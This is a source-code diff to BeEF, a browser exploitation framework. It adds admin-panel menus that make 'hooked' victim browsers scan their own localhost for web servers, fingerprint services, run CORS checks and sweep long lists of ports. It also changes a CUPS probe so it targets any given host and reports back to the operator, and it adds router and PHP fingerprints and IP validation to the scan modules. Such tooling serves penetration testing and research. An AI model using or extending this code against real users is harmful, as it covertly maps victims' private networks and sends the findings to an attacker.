diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index a91e2c937..3cffc24d9 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -351,6 +351,12 @@ module BeEF # log a few info of newly hooked zombie in the console print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]" + # add localhost as network host + if config.get('beef.extension.network.enable') + print_debug("Hooked browser has network interface 127.0.0.1") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => '127.0.0.1', :hostname => 'localhost', :os => BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName'), :cid => 'init') + r.save + end # Call autorun modules if config.get('beef.autorun.enable') diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js index dfd9e4bf3..9dd47a21c 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js @@ -351,7 +351,159 @@ ZombieTab_Network = function(zombie) { var ip = record.get('ip'); var class_c = ip.split(".")[0]+"."+ip.split(".")[1]+"."+ip.split(".")[2]; var ip_range = class_c+'.1-'+class_c+'.255'; - grid.rowCtxMenu = new Ext.menu.Menu({ + // menu options for localhost + if (class_c == '127.0.0') { + grid.rowCtxMenu = new Ext.menu.Menu({ + items: [ + { + text: 'Discover Web Servers', + iconCls: 'network-host-ctxMenu-web', + menu: { + xtype: 'menu', + items: [{ + text: 'Host ('+ip+')', + iconCls: 'network-host-ctxMenu-host', + handler: function() { + var mod_id = get_module_id("get_http_servers"); + commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip+'-'+ip}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] + } + },{ + text: 'Fingerprint HTTP', + iconCls: 'network-host-ctxMenu-fingerprint', + menu: { + xtype: 'menu', + items: [{ + text: 'Host ('+ip+')', + iconCls: 'network-host-ctxMenu-host', + handler: function() { + var mod_id = get_module_id("internal_network_fingerprinting"); + commands_statusbar.update_sending('Fingerprinting ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip+'-'+ip}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] + } + },{ + text: 'CORS Scan', + iconCls: 'network-host-ctxMenu-cors', + menu: { + xtype: 'menu', + items: [{ + text: 'Host ('+ip+')', + iconCls: 'network-host-ctxMenu-host', + handler: function() { + var mod_id = get_module_id("cross_origin_scanner"); + commands_statusbar.update_sending('CORS scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip+'-'+ip}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] + } + },{ + text: 'Port Scan', + iconCls: 'network-host-ctxMenu-network', + menu: { + xtype: 'menu', + items: [{ + text: 'Common Ports', + iconCls: 'network-host-ctxMenu-host', + handler: function() { + var mod_id = get_module_id("port_scanner"); + var ports = '21,22,23,25,80,81,443,445,1080,8080,8081,8090,8443,3000,3128,3389,3306,5432,6379,10000,10443'; + commands_statusbar.update_sending('Port scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipHost":ip,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + },{ + text: 'Specify Ports', + iconCls: 'network-host-ctxMenu-config', + handler: function() { + var mod_id = get_module_id("port_scanner"); + var ports = prompt("Enter ports to scan:", '1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Port scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipHost":ip,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] + } + }] + }); + // menu options for all hosts other than 127.0.0.x + } else { + grid.rowCtxMenu = new Ext.menu.Menu({ items: [ { text: 'Discover Web Servers', @@ -564,7 +716,8 @@ ZombieTab_Network = function(zombie) { }] } }] - }); + }); + } grid.rowCtxMenu.showAt(e.getXY()); }, afterrender: function(datagrid) { diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb index d3e58601b..5b729ce06 100644 --- a/modules/exploits/router/asus_rt_series_get_info/module.rb +++ b/modules/exploits/router/asus_rt_series_get_info/module.rb @@ -29,7 +29,7 @@ class Asus_rt_series_get_info < BeEF::Core::Command gateway = "#{$5}" dns_servers = "#{$6}" - if !ip.nil? + if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found Asus RT series router [ip: #{ip}]") r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid) r.save @@ -41,21 +41,25 @@ class Asus_rt_series_get_info < BeEF::Core::Command if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/ ip = $1 mac = $2 - print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]") - r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid) - r.save + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid) + r.save + end end end - if !gateway.nil? + if !gateway.nil? && BeEF::Filters.is_valid_ip?(gateway) print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]") r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid) r.save end if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/ dns_servers.split(/ /).uniq.each do |dns| - print_debug("Hooked browser found DNS server [ip: #{dns}]") - r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid) - r.save + if BeEF::Filters.is_valid_ip?(dns) + print_debug("Hooked browser found DNS server [ip: #{dns}]") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid) + r.save + end end end end diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js index b2d19317b..5974c9718 100644 --- a/modules/host/detect_cups/command.js +++ b/modules/host/detect_cups/command.js @@ -9,14 +9,14 @@ beef.execute(function() { var result = "Not Installed"; var dom = document.createElement('b'); var img = new Image; - img.src = "http://127.0.0.1:631/images/cups-icon.png"; + img.src = "http://<%= @ipHost %>:<%= @port %>/images/cups-icon.png"; img.onload = function() { if (this.width == 128 && this.height == 128) result="Installed"; - beef.net.send('<%= @command_url %>', <%= @command_id %>,'cups='+result); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result); dom.removeChild(this); } img.onerror = function() { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'cups='+result); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result); dom.removeChild(this); } dom.appendChild(img); diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb index 6a5d3116b..bb5bf4303 100644 --- a/modules/host/detect_cups/module.rb +++ b/modules/host/detect_cups/module.rb @@ -5,9 +5,32 @@ # class Detect_cups < BeEF::Core::Command + + def self.options + return [ + {'name' => 'ipHost', 'ui_label' => 'IP or Hostname', 'value' => '127.0.0.1'}, + {'name' => 'port' , 'ui_label' => 'Port', 'value' => '631'} + ] + end def post_execute save({'CUPS' => @datastore['cups']}) + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&cups=Installed$/ + proto = $1 + ip = $2 + port = $3 + session_id = @datastore['beefhook'] + cid = @datastore['cid'].to_i + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found 'CUPS' [proto: #{proto}, ip: #{ip}, port: #{port}]") + r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => 'CUPS', :cid => cid) + r.save + end + end + end end end diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb index 7d497d1b7..9c516e87f 100755 --- a/modules/host/get_internal_ip_webrtc/module.rb +++ b/modules/host/get_internal_ip_webrtc/module.rb @@ -24,6 +24,7 @@ class Get_internal_ip_webrtc < BeEF::Core::Command ips.uniq.each do |ip| next unless ip =~ /^[\d\.]+$/ next if ip =~ /^0\.0\.0\.0$/ + next unless BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser has network interface #{ip}") r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid) r.save diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb index 4a080bc21..dc7804ddb 100644 --- a/modules/network/cross_origin_scanner/module.rb +++ b/modules/network/cross_origin_scanner/module.rb @@ -21,7 +21,7 @@ class Cross_origin_scanner < BeEF::Core::Command ip = $1 port = $2 print_debug("Hooked browser found HTTP server #{ip}:#{port}") - if !ip.nil? && !port.nil? + if !ip.nil? && !port.nil? && BeEF::Filters.is_valid_ip?(ip) r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid) r.save end diff --git a/modules/network/get_http_servers/module.rb b/modules/network/get_http_servers/module.rb index 4afcd1d01..31c5846ed 100644 --- a/modules/network/get_http_servers/module.rb +++ b/modules/network/get_http_servers/module.rb @@ -33,7 +33,7 @@ class Get_http_servers < BeEF::Core::Command url = $4 session_id = @datastore['beefhook'] cid = @datastore['cid'].to_i - if !ip.nil? + if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]") r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => "HTTP Server", :cid => cid) r.save diff --git a/modules/network/identify_lan_subnets/module.rb b/modules/network/identify_lan_subnets/module.rb index 51aa7ca93..436950477 100644 --- a/modules/network/identify_lan_subnets/module.rb +++ b/modules/network/identify_lan_subnets/module.rb @@ -36,6 +36,7 @@ class Identify_lan_subnets < BeEF::Core::Command hosts.split(',').flatten.each do |ip| next if ip.nil? next unless ip.to_s =~ /^([\d\.]+)$/ + next unless BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found host #{ip}") r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid) r.save diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 0eff974dc..6cf576603 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -88,6 +88,10 @@ beef.execute(function() { "Microsoft IIS", "80","http",false, "/pagerror.gif",36,48), + new Array( + "PHP", + "80","http",false, + "/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42",120,67), new Array( "QNAP NAS", "8080","http",false, @@ -97,9 +101,13 @@ beef.execute(function() { "443","https",false, "/cgi-bin/images/login/cloud_portal.png",165,32), new Array( - "Asus Router", + "Asus RT Series Router", "80","http",false, "/images/top-02.gif",359,78), + new Array( + "Asus RX Series Router", + "80","http",false, + "/images/bu_blue.gif",82,16), new Array( "Belkin Router", "80","http",false, diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb index cb928e86f..2a3086307 100644 --- a/modules/network/internal_network_fingerprinting/module.rb +++ b/modules/network/internal_network_fingerprinting/module.rb @@ -35,7 +35,7 @@ class Internal_network_fingerprinting < BeEF::Core::Command url = $5 session_id = @datastore['beefhook'] cid = @datastore['cid'].to_i - if !ip.nil? + if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]") r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid) r.save diff --git a/modules/network/jslanscanner/command.js b/modules/network/jslanscanner/command.js index a20f5a529..45ef3f56a 100644 --- a/modules/network/jslanscanner/command.js +++ b/modules/network/jslanscanner/command.js @@ -220,6 +220,7 @@ beef.execute(function() { {make:'SMC',model:'7004ABR',graphic:'/images/logo.gif'}, {make:'DLink',model:'DI524',graphic:'/m524.gif'}, {make:'Cisco',model:'2600',graphic:'/images/logo.png'}, + {make:'ASUS',model:'RX Series',graphic:'/images/banner_sys4bg.gif'}, {make:'ASUS',model:'RT Series',graphic:'/images/EZSetup_button.gif'} ]; diff --git a/modules/network/jslanscanner/module.rb b/modules/network/jslanscanner/module.rb index 0352c31ae..daa0a851a 100644 --- a/modules/network/jslanscanner/module.rb +++ b/modules/network/jslanscanner/module.rb @@ -35,7 +35,7 @@ class Fingerprint_routers < BeEF::Core::Command device = $2 session_id = @datastore['beefhook'] cid = @datastore['cid'].to_i - if !ip.nil? + if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found network device " + device + " [ip: #{ip}]") r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => device, :cid => cid) r.save diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb index 4081ff2f8..b99ef8a6e 100644 --- a/modules/network/ping_sweep/module.rb +++ b/modules/network/ping_sweep/module.rb @@ -36,9 +36,11 @@ class Ping_sweep < BeEF::Core::Command # save the network host if @datastore['results'] =~ /host=([\d\.]+) is alive/ ip = $1 - print_debug("Hooked browser has network interface #{ip}") - r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid) - r.save + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser has network interface #{ip}") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid) + r.save + end end end diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb index afb9c18b1..35d13dd67 100644 --- a/modules/network/port_scanner/module.rb +++ b/modules/network/port_scanner/module.rb @@ -38,7 +38,7 @@ class Port_scanner < BeEF::Core::Command service = $4 session_id = @datastore['beefhook'] cid = @datastore['cid'].to_i - if !ip.nil? + if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]") r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => service, :cid => cid) r.save